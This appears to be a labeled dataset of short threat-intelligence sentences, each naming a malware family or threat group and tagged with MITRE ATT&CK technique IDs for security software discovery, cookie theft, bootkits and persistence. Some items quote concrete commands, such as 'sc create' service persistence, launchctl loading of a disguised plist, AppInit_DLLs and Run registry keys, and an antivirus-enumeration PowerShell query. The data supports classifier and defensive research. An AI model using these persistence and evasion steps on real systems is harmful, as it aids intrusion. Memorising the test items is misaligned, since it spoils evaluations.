{"text1":"Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine.","labels":"['T1518.001']"}
{"text1":"Comnie attempts to detect several anti-virus products.","labels":"['T1518.001']"}
{"text1":"DarkWatchman can search for anti-virus products on the system.","labels":"['T1518.001']"}
{"text1":"Darkhotel has searched for anti-malware strings and anti-virus processes running on the system.","labels":"['T1518.001']"}
{"text1":"During Frankenstein, the threat actors used WMI queries to determine if analysis tools were running on a compromised system.","labels":"['T1518.001']"}
{"text1":"During Operation Wocao, threat actors used scripts to detect security software.","labels":"['T1518.001']"}
{"text1":"EVILNUM can search for anti-virus products on the system.","labels":"['T1518.001']"}
{"text1":"Empire can enumerate antivirus software on the target.","labels":"['T1518.001']"}
{"text1":"Epic searches for anti-malware services running on the victim\u2019s machine and terminates itself if it finds them.","labels":"['T1518.001']"}
{"text1":"EvilBunny has been observed querying installed antivirus software.","labels":"['T1518.001']"}
{"text1":"FELIXROOT checks for installed security software like antivirus and firewall.","labels":"['T1518.001']"}
{"text1":"FIN8 has used Registry keys to detect and avoid executing in potential sandboxes.","labels":"['T1518.001']"}
{"text1":"Felismus checks for processes associated with anti-virus vendors.","labels":"['T1518.001']"}
{"text1":"FinFisher probes the system to check for antimalware processes.","labels":"['T1518.001']"}
{"text1":"Flame identifies security software such as antivirus through the Security module.","labels":"['T1518.001']"}
{"text1":"FlawedAmmyy will attempt to detect anti-virus products during the initial infection.","labels":"['T1518.001']"}
{"text1":"Frankenstein has used WMI queries to detect if virtualization environments or analysis tools were running on the system.","labels":"['T1518.001']"}
{"text1":"FunnyDream can identify the processes for Bkav antivirus.","labels":"['T1518.001']"}
{"text1":"Gelsemium can check for the presence of specific security products.","labels":"['T1518.001']"}
{"text1":"Gold Dragon checks for anti-malware products and processes.","labels":"['T1518.001']"}
{"text1":"Grandoreiro can list installed security products including the Trusteer and Diebold Warsaw GAS Tecnologia online banking protections.","labels":"['T1518.001']"}
{"text1":"InvisiMole can check for the presence of network sniffers, AV, and BitDefender firewall.","labels":"['T1518.001']"}
{"text1":"JPIN checks for the presence of certain security-related processes and deletes its installer\/uninstaller component if it identifies any of them.","labels":"['T1518.001']"}
{"text1":"Kimsuky has checked for the presence of antivirus software with \"powershell Get-CimInstance -Namespace root\/securityCenter2 \u2013 classname antivirusproduct\".","labels":"['T1518.001']"}
{"text1":"LiteDuke has the ability to check for the presence of Kaspersky security software.","labels":"['T1518.001']"}
{"text1":"LitePower can identify installed AV software.","labels":"['T1518.001']"}
{"text1":"MarkiRAT can check for running processes on the victim\u2019s machine to look for Kaspersky and Bitdefender antivirus products.","labels":"['T1518.001']"}
{"text1":"Meteor has the ability to search for Kaspersky Antivirus on a victim's machine.","labels":"['T1518.001']"}
{"text1":"More_eggs can obtain information on installed anti-malware programs.","labels":"['T1518.001']"}
{"text1":"MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.","labels":"['T1518.001']"}
{"text1":"Naikon uses commands such as \"netsh advfirewall firewall\" to discover local firewall settings.","labels":"['T1518.001']"}
{"text1":"Netwalker can detect and terminate active security software-related processes on infected systems.","labels":"['T1518.001', 'T1562.001']"}
{"text1":"NotPetya determines if specific antivirus programs are running on an infected host machine.","labels":"['T1518.001']"}
{"text1":"POWERSTATS has detected security tools.","labels":"['T1518.001']"}
{"text1":"POWRUNER may collect information on the victim's anti-virus software.","labels":"['T1518.001']"}
{"text1":"PUNCHBUGGY can gather AVs registered in the system.","labels":"['T1518.001']"}
{"text1":"Patchwork scanned the \u201cProgram Files\u201d directories for a directory with the string \u201cTotal Security\u201d (the installation path of the \u201c360 Total Security\u201d antivirus tool).","labels":"['T1518.001']"}
{"text1":"PipeMon can check for the presence of ESET and Kaspersky security software.","labels":"['T1518.001']"}
{"text1":"QakBot can identify the installed antivirus product on a targeted system.","labels":"['T1518.001']"}
{"text1":"RTM can obtain information about security software on the victim.","labels":"['T1518.001']"}
{"text1":"Remsec has a plugin to detect active drivers of some security products.","labels":"['T1518.001']"}
{"text1":"Rocke used scripts which detected and uninstalled antivirus software.","labels":"['T1518.001', 'T1562.001']"}
{"text1":"SILENTTRINITY can determine if an anti-virus product is installed through the resolution of the service's virtual SID.","labels":"['T1518.001']"}
{"text1":"SUNBURST checked for a variety of antivirus\/endpoint detection agents prior to execution.","labels":"['T1518.001']"}
{"text1":"SideCopy uses a loader DLL file to collect AV product names from an infected host.","labels":"['T1518.001']"}
{"text1":"Sidewinder has used the Windows service \"winmgmts:\\\\.\\root\\SecurityCenter2\" to check installed antivirus products.","labels":"['T1518.001']"}
{"text1":"Skidmap has the ability to check if \"\/usr\/sbin\/setenforce\" exists. This file controls what mode SELinux is in.","labels":"['T1518.001']"}
{"text1":"StoneDrill can check for antivirus and antimalware programs.","labels":"['T1518.001']"}
{"text1":"T9000 performs checks for various antivirus and security products during installation.","labels":"['T1518.001']"}
{"text1":"Tasklist can be used to enumerate security software currently running on a system by process name of known products.","labels":"['T1518.001']"}
{"text1":"TeamTNT has searched for security products on infected machines.","labels":"['T1518.001']"}
{"text1":"The White Company has checked for specific antivirus products on the target\u2019s computer, including Kaspersky, Quick Heal, AVG, BitDefender, Avira, Sophos, Avast!, and ESET.","labels":"['T1518.001']"}
{"text1":"The main CozyCar dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit.","labels":"['T1518.001']"}
{"text1":"ThiefQuest uses the \"kill_unwanted\" function to get a list of running processes, compares each process with an encrypted list of \u201cunwanted\u201d security related programs, and kills the processes for security related programs.","labels":"['T1518.001']"}
{"text1":"Tropic Trooper can search for anti-virus software running on the system.","labels":"['T1518.001']"}
{"text1":"Turla has obtained information on security software, including security logging information that may indicate whether their malware has been detected.","labels":"['T1518.001']"}
{"text1":"Valak can determine if a compromised host has security products installed.","labels":"['T1518.001']"}
{"text1":"Waterbear can find the presence of a specific security software.","labels":"['T1518.001']"}
{"text1":"WhisperGate can recognize the presence of monitoring tools on a target system.","labels":"['T1518.001']"}
{"text1":"Windshift has used malware to identify installed AV and commonly used forensic and malware analysis tools.","labels":"['T1518.001']"}
{"text1":"Wingbird checks for the presence of Bitdefender security software.","labels":"['T1518.001']"}
{"text1":"Wizard Spider has used WMI to identify anti-virus products installed on a victim's machine.","labels":"['T1518.001']"}
{"text1":"Zeus Panda checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim\u2019s environment.","labels":"['T1518.001']"}
{"text1":"down_new has the ability to detect anti-virus products and processes on a compromised host.","labels":"['T1518.001']"}
{"text1":"jRAT can list security software, such as by using WMIC to identify anti-virus products installed on the victim\u2019s machine and to obtain firewall details.","labels":"['T1518.001']"}
{"text1":"netsh can be used to discover system firewall settings.","labels":"['T1518.001']"}
{"text1":"xCaon has checked for the existence of Kaspersky antivirus software on the system.","labels":"['T1518.001']"}
{"text1":"AADInternals can enumerate information about a variety of cloud services, such as Office 365 and Sharepoint instances or OpenID Configurations.","labels":"['T1526']"}
{"text1":"APT28 has used several malicious applications to steal user OAuth access tokens including applications masquerading as \"Google Defender\" \"Google Email Protection,\" and \"Google Scanner\" for Gmail users. They also targeted Yahoo users with applications masquerading as \"Delivery Service\" and \"McAfee Email Protection\".","labels":"['T1528']"}
{"text1":"Peirates gathers Kubernetes service account tokens using a variety of techniques.","labels":"['T1528']"}
{"text1":"APT37 has used malware that will issue the command \"shutdown \/r \/t 1\" to reboot a system after wiping its MBR.","labels":"['T1529']"}
{"text1":"APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR.","labels":"['T1529']"}
{"text1":"DCSrv has a function to sleep for two hours before rebooting the system.","labels":"['T1529']"}
{"text1":"DustySky can shutdown the infected machine.","labels":"['T1529']"}
{"text1":"KillDisk attempts to reboot the machine by terminating specific processes.","labels":"['T1529']"}
{"text1":"LockerGoga has been observed shutting down infected systems.","labels":"['T1529']"}
{"text1":"LookBack can shutdown and reboot the victim machine.","labels":"['T1529']"}
{"text1":"NotPetya will reboot the system one hour after infection.","labels":"['T1529']"}
{"text1":"Peirates can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3.","labels":"['T1530']"}
{"text1":"LAPSUS$ has removed a targeted organization's global admin accounts to lock the organization out of all access.","labels":"['T1531']"}
{"text1":"LockerGoga has been observed changing account passwords and logging off current users.","labels":"['T1531']"}
{"text1":"Meteor has the ability to change the password of local users on compromised hosts and can log off users.","labels":"['T1531']"}
{"text1":"HEXANE has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access.","labels":"['T1534']"}
{"text1":"Kimsuky has sent internal spearphishing emails for lateral movement after stealing victim information.","labels":"['T1534']"}
{"text1":"Lazarus Group has conducted internal spearphishing from within a compromised organization.","labels":"['T1534']"}
{"text1":"Leviathan has conducted internal spearphishing within the victim's environment for lateral movement.","labels":"['T1534']"}
{"text1":"APT29 has stolen Chrome browser cookies by copying the Chrome profile directories of targeted users.","labels":"['T1539']"}
{"text1":"BLUELIGHT can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers.","labels":"['T1539']"}
{"text1":"Chaes has used a script that extracts the web session cookie and sends it to the C2 server.","labels":"['T1539']"}
{"text1":"CookieMiner can steal Google Chrome and Apple Safari browser cookies from the victim\u2019s machine.","labels":"['T1539']"}
{"text1":"EVILNUM can harvest cookies and upload them to the C2 server.","labels":"['T1539']"}
{"text1":"Evilnum can steal cookies and session information from browsers.","labels":"['T1539']"}
{"text1":"Grandoreiro can steal the victim's cookies to use for duplicating the active session from another device.","labels":"['T1539']"}
{"text1":"QakBot has the ability to capture web session cookies.","labels":"['T1539']"}
{"text1":"XCSSET uses \"scp\" to access the \"~\/Library\/Cookies\/Cookies.binarycookies\" file.","labels":"['T1539']"}
{"text1":"Cyclops Blink has maintained persistence by patching legitimate device firmware when it is downloaded, including that of WatchGuard devices.","labels":"['T1542.002']"}
{"text1":"Equation is known to have the capability to overwrite the firmware on hard drives from some manufacturers.","labels":"['T1542.002']"}
{"text1":"APT28 has deployed a bootkit along with Downdelph to ensure its persistence on the victim. The bootkit shares code with some variants of BlackEnergy.","labels":"['T1542.003']"}
{"text1":"APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.","labels":"['T1542.003']"}
{"text1":"BOOTRASH is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.","labels":"['T1542.003']"}
{"text1":"Carberp has installed a bootkit on the system to maintain persistence.","labels":"['T1542.003']"}
{"text1":"Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down.","labels":"['T1542.003']"}
{"text1":"ROCKBOOT is a Master Boot Record (MBR) bootkit that uses the MBR to establish persistence.","labels":"['T1542.003']"}
{"text1":"Some FinFisher variants incorporate an MBR rootkit.","labels":"['T1542.003']"}
{"text1":"TrickBot can implant malicious code into a compromised device's firmware.","labels":"['T1542.003']"}
{"text1":"Exaramel for Linux has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.","labels":"['T1543']"}
{"text1":"FatDuke has the ability to create a process.","labels":"['T1543']"}
{"text1":"MiniDuke can create a process on a compromised host.","labels":"['T1543']"}
{"text1":"Bundlore can persist via a LaunchAgent.","labels":"['T1543.001']"}
{"text1":"CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.","labels":"['T1543.001']"}
{"text1":"CookieMiner has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.","labels":"['T1543.001']"}
{"text1":"CrossRAT creates a Launch Agent on macOS.","labels":"['T1543.001']"}
{"text1":"FruitFly persists via a Launch Agent.","labels":"['T1543.001']"}
{"text1":"Keydnap uses a Launch Agent to persist.","labels":"['T1543.001']"}
{"text1":"MacMa installs a `com.apple.softwareupdate.plist` file in the `\/LaunchAgents` folder with the `RunAtLoad` value set to `true`. Upon user login, MacMa is executed from `\/var\/root\/.local\/softwareupdate` with root privileges. Some variations also include the `LimitLoadToSessionType` key with the value `Aqua`, ensuring the MacMa only runs when there is a logged in GUI user.","labels":"['T1543.001']"}
{"text1":"MacSpy persists via a Launch Agent.","labels":"['T1543.001']"}
{"text1":"NETWIRE can use launch agents for persistence.","labels":"['T1543.001']"}
{"text1":"The Komplex trojan creates a persistent launch agent called with \"$HOME\/Library\/LaunchAgents\/com.apple.updates.plist\" with \"launchctl load -w ~\/Library\/LaunchAgents\/com.apple.updates.plist\".","labels":"['T1543.001']"}
{"text1":"Exaramel for Linux has a hardcoded location under systemd that it uses to achieve persistence if it is running as root.","labels":"['T1543.002']"}
{"text1":"Hildegard has started a monero service.","labels":"['T1543.002']"}
{"text1":"Pupy can be used to establish persistence using a systemd service.","labels":"['T1543.002']"}
{"text1":"Rocke has installed a systemd service script to maintain persistence.","labels":"['T1543.002']"}
{"text1":"A Threat Group-3390 tool can create a new service, naming it after the config information, to gain persistence.","labels":"['T1543.003']"}
{"text1":"APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. APT32 also creates a Windows service to establish persistence.","labels":"['T1543.003']"}
{"text1":"APT38 has installed a new Windows service to establish persistence.","labels":"['T1543.003']"}
{"text1":"APT41 modified legitimate Windows services to install malware backdoors. APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.","labels":"['T1543.003']"}
{"text1":"An APT19 Port 22 malware variant registers itself as a service.","labels":"['T1543.003']"}
{"text1":"Anchor can establish persistence by creating a service.","labels":"['T1543.003']"}
{"text1":"Attor's dispatcher can establish persistence by registering a new service.","labels":"['T1543.003']"}
{"text1":"AuditCred is installed as a new service on the system.","labels":"['T1543.003']"}
{"text1":"BBSRAT can modify service configurations.","labels":"['T1543.003']"}
{"text1":"Bankshot can terminate a specific process by its process id.","labels":"['T1543.003']"}
{"text1":"Bisonal has been modified to be used as a Windows service.","labels":"['T1543.003']"}
{"text1":"BitPaymer has attempted to install itself as a service to maintain persistence.","labels":"['T1543.003']"}
{"text1":"Blue Mockingbird has made their XMRIG payloads persistent as a Windows Service.","labels":"['T1543.003']"}
{"text1":"Briba installs a service pointing to a malicious DLL dropped to disk.","labels":"['T1543.003']"}
{"text1":"Carbon establishes persistence by creating a service and naming it based off the operating system version running on the current machine.","labels":"['T1543.003']"}
{"text1":"Catchamas adds a new service named NetAdapter to establish persistence.","labels":"['T1543.003']"}
{"text1":"Clambling can register itself as a system service to gain persistence.","labels":"['T1543.003']"}
{"text1":"Conficker copies itself into the \"%systemroot%\\system32\" directory and registers as a service.","labels":"['T1543.003']"}
{"text1":"CosmicDuke uses Windows services typically named \"javamtsup\" for persistence.","labels":"['T1543.003']"}
{"text1":"Cuba can modify services by using the \"OpenService\" and \"ChangeServiceConfig\" functions.","labels":"['T1543.003']"}
{"text1":"DCSrv has created new services for persistence by modifying the Registry.","labels":"['T1543.003']"}
{"text1":"DarkVishnya created new services for shellcode loaders distribution.","labels":"['T1543.003']"}
{"text1":"During Operation CuckooBees, the threat actors modified the `IKEEXT` and `PrintNotify` Windows services for persistence.","labels":"['T1543.003']"}
{"text1":"Dyre registers itself as a service by adding several Registry keys.","labels":"['T1543.003']"}
{"text1":"Earth Lusca created a service using the command \"sc create \u201cSysUpdate\u201d binpath= \u201ccmd \/c start \u201c[file path]\u201d\u201d&&sc config \u201cSysUpdate\u201d start= auto&&net\nstart SysUpdate\" for persistence.","labels":"['T1543.003']"}
{"text1":"Elise configures itself as a service.","labels":"['T1543.003']"}
{"text1":"Emissary is capable of configuring itself as a service.","labels":"['T1543.003']"}
{"text1":"Emotet has been observed creating new services to maintain persistence.","labels":"['T1543.003']"}
{"text1":"Empire can utilize built-in modules to modify service binaries and restore them to their original state.","labels":"['T1543.003']"}
{"text1":"FALLCHILL has been installed as a Windows service.","labels":"['T1543.003']"}
{"text1":"FIN7 created new Windows services and added them to the startup directories for persistence.","labels":"['T1543.003']"}
{"text1":"FinFisher creates a new Windows service with the malicious executable for persistence.","labels":"['T1543.003']"}
{"text1":"FunnyDream has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically.","labels":"['T1543.003']"}
{"text1":"Honeybee has batch files that modify the system service COMSysApp to load a malicious DLL.","labels":"['T1543.003']"}
{"text1":"Hydraq creates new services to establish persistence.","labels":"['T1543.003']"}
{"text1":"If running as administrator, TDTESS installs itself as a new service named bmwappushservice to establish persistence.","labels":"['T1543.003']"}
{"text1":"InvisiMole can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.","labels":"['T1543.003']"}
{"text1":"JHUHUGIT has registered itself as a service to establish persistence.","labels":"['T1543.003']"}
{"text1":"Kazuar can install itself as a new service.","labels":"['T1543.003']"}
{"text1":"Ke3chang backdoor RoyalDNS established persistence through adding a service called \"Nwsapagent\".","labels":"['T1543.003']"}
{"text1":"KeyBoy installs a service pointing to a malicious DLL dropped to disk.","labels":"['T1543.003']"}
{"text1":"Kimsuky has created new services for persistence.","labels":"['T1543.003']"}
{"text1":"LoudMiner can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.","labels":"['T1543.003']"}
{"text1":"MoonWind installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.","labels":"['T1543.003']"}
{"text1":"Naid creates a new service to establish.","labels":"['T1543.003']"}
{"text1":"Nebulae can create a service to establish persistence.","labels":"['T1543.003']"}
{"text1":"Nidiran can create a new service named msamger (Microsoft Security Accounts Manager).","labels":"['T1543.003']"}
{"text1":"One variant of BlackEnergy creates a new service using either a hard-coded or randomly generated name.","labels":"['T1543.003']"}
{"text1":"PROMETHIUM has created new services and modified existing services for persistence.","labels":"['T1543.003']"}
{"text1":"Pandora has the ability to gain system privileges through Windows services.","labels":"['T1543.003']"}
{"text1":"PingPull has the ability to install itself as a service.","labels":"['T1543.003']"}
{"text1":"PlugX can be added as a service to establish persistence. PlugX also has a module to change service configurations as well as start, control, and delete services.","labels":"['T1543.003']"}
{"text1":"PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace\/modify service binaries, paths, and configs.","labels":"['T1543.003']"}
{"text1":"PsExec can leverage Windows services to escalate privileges from administrator to SYSTEM with the \"-s\" argument.","labels":"['T1543.003']"}
{"text1":"RDAT has created a service when it is installed on the victim machine.","labels":"['T1543.003']"}
{"text1":"Ragnar Locker has used sc.exe to create a new service for the VirtualBox driver.","labels":"['T1543.003']"}
{"text1":"RawPOS installs itself as a service to maintain persistence.","labels":"['T1543.003']"}
{"text1":"Reaver installs itself as a new service.","labels":"['T1543.003']"}
{"text1":"SLOTHFULMEDIA has created a service on victim machines named \"TaskFrame\" to establish persistence.","labels":"['T1543.003']"}
{"text1":"STARWHALE has the ability to create the following Windows service to establish persistence on an infected host: `sc create Windowscarpstss binpath= \"cmd.exe \/c cscript.exe c:\\\\windows\\\\system32\\\\w7_1.wsf humpback_whale\" start= \"auto\" obj= \"LocalSystem\"`.","labels":"['T1543.003']"}
{"text1":"SUGARUSH has created a service named `Service1` for persistence.","labels":"['T1543.003']"}
{"text1":"Several Lazarus Group malware families install themselves as new services.","labels":"['T1543.003']"}
{"text1":"Shamoon creates a new service named \u201cntssrv\u201d to execute the payload. Newer versions create the \"MaintenaceSrv\" and \"hdv_725x\" services.","labels":"['T1543.003']"}
{"text1":"ShimRat has installed a Windows service to maintain persistence on victim machines.","labels":"['T1543.003']"}
{"text1":"Some InnaputRAT variants create a new Windows service to establish persistence.","labels":"['T1543.003']"}
{"text1":"Some Sakula samples install themselves as services for persistence by calling WinExec with the \"net start\" argument.","labels":"['T1543.003']"}
{"text1":"StreamEx establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.","labels":"['T1543.003']"}
{"text1":"Stuxnet uses a driver registered as a boot start service as the main load-point.","labels":"['T1543.003']"}
{"text1":"TEARDROP ran as a Windows service from the \"c:\\windows\\syswow64\" folder.","labels":"['T1543.003']"}
{"text1":"TYPEFRAME variants can add malicious DLL modules as new services.TYPEFRAME can also delete services from the victim\u2019s machine.","labels":"['T1543.003']"}
{"text1":"The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description \u201cWindows Check AV.\u201d","labels":"['T1543.003']"}
{"text1":"ThreatNeedle can run in memory and register its payload as a Windows service.","labels":"['T1543.003']"}
{"text1":"TinyZBot can install as a Windows service for persistence.","labels":"['T1543.003']"}
{"text1":"To establish persistence, Okrum can install itself as a new service named NtmSsvc.","labels":"['T1543.003']"}
{"text1":"TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.","labels":"['T1543.003']"}
{"text1":"Tropic Trooper has installed a service pointing to a malicious DLL dropped to disk.","labels":"['T1543.003']"}
{"text1":"Volgmer installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some Volgmer variants also install .dll files as services with names generated by a list of hard-coded strings.","labels":"['T1543.003']"}
{"text1":"WastedLocker created and established a service that runs until the encryption process is complete.","labels":"['T1543.003']"}
{"text1":"Wingbird uses services.exe to register a new autostart service named \"Audit Service\" using a copy of the local lsass.exe file.","labels":"['T1543.003', 'T1569.002']"}
{"text1":"Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence.","labels":"['T1543.003']"}
{"text1":"Wizard Spider has installed TrickBot as a service named ControlServiceA in order to establish persistence.","labels":"['T1543.003']"}
{"text1":"ZLib creates Registry keys to allow itself to run as various services.","labels":"['T1543.003']"}
{"text1":"ZxShell can create a new service using the service parser function ProcessScCommand.","labels":"['T1543.003']"}
{"text1":"gh0st RAT can create a new service to establish persistence.","labels":"['T1543.003']"}
{"text1":"hcdLoader installs itself as a service for persistence.","labels":"['T1543.003']"}
{"text1":"AppleJeus has placed a plist file within the \"LaunchDaemons\" folder and launched it manually.","labels":"['T1543.004']"}
{"text1":"Bundlore can persist via a LaunchDaemon.","labels":"['T1543.004']"}
{"text1":"Dacls can establish persistence via a Launch Daemon.","labels":"['T1543.004']"}
{"text1":"If running with \"root\" permissions, OSX_OCEANLOTUS.D can create a persistence file in the folder \"\/Library\/LaunchDaemons\".","labels":"['T1543.004']"}
{"text1":"When running with root privileges after a Launch Agent is installed, ThiefQuest installs a plist file to the \"\/Library\/LaunchDaemons\/\" folder with the \"RunAtLoad\" key set to \"true\" establishing persistence as a Launch Daemon.","labels":"['T1543.004']"}
{"text1":"XCSSET uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.","labels":"['T1543.004']"}
{"text1":"Kimsuky has a HWP document stealer module which changes the default program association in the registry to open HWP documents.","labels":"['T1546.001']"}
{"text1":"SILENTTRINITY can conduct an image hijack of an `.msc` file extension as part of its UAC bypass process.","labels":"['T1546.001']"}
{"text1":"Gazer can establish persistence through the system screensaver by configuring it to execute the malware.","labels":"['T1546.002']"}
{"text1":"APT29 has used WMI event subscriptions for persistence.","labels":"['T1546.003']"}
{"text1":"APT33 has attempted to use WMI event subscriptions to establish persistence on compromised hosts.","labels":"['T1546.003']"}
{"text1":"Blue Mockingbird has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.","labels":"['T1546.003']"}
{"text1":"Leviathan has used WMI for persistence.","labels":"['T1546.003']"}
{"text1":"Mustang Panda's custom ORat tool uses a WMI event consumer to maintain persistence.","labels":"['T1546.003']"}
{"text1":"POSHSPY uses a WMI event subscription to establish persistence.","labels":"['T1546.003']"}
{"text1":"POWERTON can use WMI for persistence.","labels":"['T1546.003']"}
{"text1":"SILENTTRINITY can create a WMI Event to execute a payload for persistence.","labels":"['T1546.003']"}
{"text1":"SeaDuke uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.","labels":"['T1546.003']"}
{"text1":"TrailBlazer has the ability to use WMI for persistence.","labels":"['T1546.003']"}
{"text1":"Turla has used WMI event filters and consumers to establish persistence.","labels":"['T1546.003']"}
{"text1":"UNC2452 used WMI event subscriptions for persistence.","labels":"['T1546.003']"}
{"text1":"adbupd can use a WMI script to achieve persistence.","labels":"['T1546.003']"}
{"text1":"Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells.","labels":"['T1546.004']"}
{"text1":"Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files.","labels":"['T1546.004']"}
{"text1":"APT29 used sticky-keys to obtain unauthenticated, privileged console access.","labels":"['T1546.008']"}
{"text1":"APT3 replaces the Sticky Keys binary \"C:\\Windows\\System32\\sethc.exe\" for persistence.","labels":"['T1546.008']"}
{"text1":"APT41 leveraged sticky keys to establish persistence.","labels":"['T1546.008']"}
{"text1":"Empire can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.","labels":"['T1546.008']"}
{"text1":"Honeybee's service-based DLL implant can execute a downloaded file with parameters specified using \"CreateProcessAsUser\".","labels":"['T1546.009']"}
{"text1":"PUNCHBUGGY can establish using a AppCertDLLs Registry key.","labels":"['T1546.009']"}
{"text1":"APT39 has used malware to set \"LoadAppInit_DLLs\" in the Registry key \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" in order to establish persistence.","labels":"['T1546.010']"}
{"text1":"If a victim meets certain criteria, T9000 uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs \u2013 %APPDATA%\\Intel\\ResN32.dll\" and \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs \u2013 0x1\".","labels":"['T1546.010']"}
{"text1":"Ramsay can insert itself into the address space of other applications using the AppInit DLL Registry key.","labels":"['T1546.010']"}
{"text1":"Some variants of Cherry Picker use AppInit_DLLs to achieve persistence by creating the following Registry key: \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows \"AppInit_DLLs\"=\"pserver32.dll\"\"","labels":"['T1546.010']"}
{"text1":"Pillowmint has used a malicious shim database to maintain persistence.","labels":"['T1546.011']"}
{"text1":"ShimRat has installed shim databases in the \"AppPatch\" folder.","labels":"['T1546.011']"}
{"text1":"SDBbot has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.","labels":"['T1546.012']"}
{"text1":"TEMP.Veles has modified and added entries within \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" to maintain persistence.","labels":"['T1546.012']"}
{"text1":"Turla has used PowerShell profiles to maintain persistence on an infected machine.","labels":"['T1546.013']"}
{"text1":"ComRAT samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location \"HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32\".","labels":"['T1546.015']"}
{"text1":"KONNI has modified ComSysApp service to load the malicious DLL payload.","labels":"['T1546.015']"}
{"text1":"Mosquito uses COM hijacking as a method of persistence.","labels":"['T1546.015']"}
{"text1":"SILENTTRINITY can add a CLSID key for payload execution through `Registry.CurrentUser.CreateSubKey(\"Software\\\\Classes\\\\CLSID\\\\{\" + clsid + \"}\\\\InProcServer32\")`.","labels":"['T1546.015']"}
{"text1":"BoxCaon established persistence by setting the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" registry key to point to its executable.","labels":"['T1547']"}
{"text1":"Dtrack\u2019s RAT makes a persistent target file with auto execution on the host start.","labels":"['T1547']"}
{"text1":"LoudMiner can automatically launch at startup if the AutoStart option is enabled in the VBoxVmService configuration file.","labels":"['T1547']"}
{"text1":"Misdat has created registry keys for persistence, including `HKCU\\Software\\dnimtsoleht\\StubPath`, `HKCU\\Software\\snimtsOleht\\StubPath`, `HKCU\\Software\\Backtsaleht\\StubPath`, `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed. Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.","labels":"['T1547']"}
{"text1":"xCaon has added persistence via the Registry key \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" which causes the malware to run each time any user logs in.","labels":"['T1547']"}
{"text1":"A Threat Group-3390 tool can add the binary\u2019s path to the Registry key \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" to add persistence.","labels":"['T1547.001']"}
{"text1":"A Turla Javascript backdoor added a local_update_check value under the Registry key \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" to establish persistence. Additionally, a Turla custom executable containing Metasploit shellcode is saved to the Startup folder to gain persistence.","labels":"['T1547.001']"}
{"text1":"A dropper used by Putter Panda installs itself into the ASEP Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" with a value named McUpdate.","labels":"['T1547.001']"}
{"text1":"A version of KONNI has dropped a Windows shortcut into the Startup folder to establish persistence.","labels":"['T1547.001']"}
{"text1":"ADVSTORESHELL achieves persistence by adding itself to the \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" Registry key.","labels":"['T1547.001']"}
{"text1":"APT18 establishes persistence via the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key.","labels":"['T1547.001']"}
{"text1":"APT28 has deployed malware that has copied itself to the startup directory for persistence.","labels":"['T1547.001']"}
{"text1":"APT29 added Registry Run keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"APT3 places scripts in the startup folder for persistence.","labels":"['T1547.001']"}
